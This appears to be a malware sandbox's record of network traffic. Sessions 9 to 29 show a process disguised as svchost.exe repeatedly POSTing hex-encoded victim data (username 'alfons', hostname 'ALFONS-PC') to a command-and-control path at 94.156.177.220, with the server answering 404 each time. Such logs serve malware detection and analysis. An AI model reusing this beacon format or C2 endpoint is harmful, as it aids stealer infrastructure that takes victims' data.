9	192.168.2.5	49726	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:23.106225967 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:23.111640930 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:24.072727919 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49732	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:24.276216984 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:24.282179117 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:25.251010895 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49742	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:25.404937983 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:25.410505056 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:26.359535933 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49749	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:26.521871090 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:26.527265072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:27.488437891 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49755	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:27.670346022 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:27.675771952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:28.665159941 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49761	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:28.820449114 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:28.825870037 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:29.791338921 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49771	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:29.950134993 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:29.955585957 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:31.109859943 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49778	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:31.263901949 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:31.270533085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:32.248469114 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49784	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:32.397342920 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:32.403234005 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:33.366935968 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49792	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:33.661962032 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:33.667351961 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:34.847650051 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49798	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:34.990396023 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:34.995763063 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:35.960557938 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49809	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:36.119483948 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:36.124867916 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:37.083184004 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49815	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:37.226938963 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:37.232323885 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:38.181829929 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49821	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:38.357383013 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:38.362776041 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:39.332216024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49829	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:39.483563900 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:39.488975048 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:40.457182884 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49838	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:40.624785900 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:40.630175114 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:41.617400885 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49844	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:41.772089005 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:41.777545929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:42.727080107 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49850	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:43.916439056 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:43.921772957 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:44.891721964 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49861	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:45.040549994 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:45.046730995 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:46.012943983 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49867	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:46.186017990 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:46.191642046 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:47.146908045 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49873	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:47.324702024 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:47.330074072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:48.291358948 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

